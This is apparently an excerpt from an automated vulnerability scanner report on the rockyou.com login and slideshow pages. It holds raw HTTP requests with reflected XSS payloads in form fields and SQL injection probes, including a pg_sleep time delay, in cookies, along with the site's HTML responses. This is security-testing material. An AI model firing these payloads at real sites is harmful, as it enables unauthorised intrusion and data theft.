(parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (insta..
Date: Mon, 18 Apr 2011 22:35:59 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:35:58 GMT; path=/; domain=.rockyou.com,lastlogin=1303166159; expires=Wed, 27-Jul-2011 22:35:59 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:35:59 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:35:59 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:35:59 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=29256 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26912
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '3';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "></script><script>netsparker(9)</script>";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSections();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); var slidelist = []; slidePrint(slidelist); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = ["","mokina"]; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source=%3E%3C/script%3E%3Cscript%3Enetsparker(9)%3C/script%3E&create=1&instanceid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (insta..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| birthyear | GET | 3 |
| country | GET | 0 |
| flixster | GET | 3 |
| mode | GET | create |
| pass | GET | 3 |
| postalcode | GET | 3 |
| sex | GET | 3 |
| source | GET | 3 |
| toscheck | GET | 1 |
| user | GET | 3 |
| user | POST | 3 |
| mode | POST | login |
| pass | POST | "></script><script>alert(9)</script> |
Request
POST /login.php?lang=en&birthyear=3&country=0&flixster=3&mode=create&pass=3&postalcode=3&sex=3&source=3&toscheck=1&user=3 HTTP/1.1
Referer: http://www.rockyou.com/login.php?lang=en&birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166328; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Content-Length: 84
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user=3&mode=login&pass=%22%3e%3c%2fscript%3e%3cscript%3enetsparker(9)%3c%2fscript%3e
Referer: http://www.rockyou.com/login.php?lang=en&birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166328; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Content-Length: 84
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user=3&mode=login&pass=%22%3e%3c%2fscript%3e%3cscript%3enetsparker(9)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:38:48 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:38:48 GMT; path=/; domain=.rockyou.com,lastlogin=1303166328; expires=Wed, 27-Jul-2011 22:38:48 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:38:48 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:38:48 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:38:48 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=91568 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9097
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\"></script><script>netsparker(9)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option 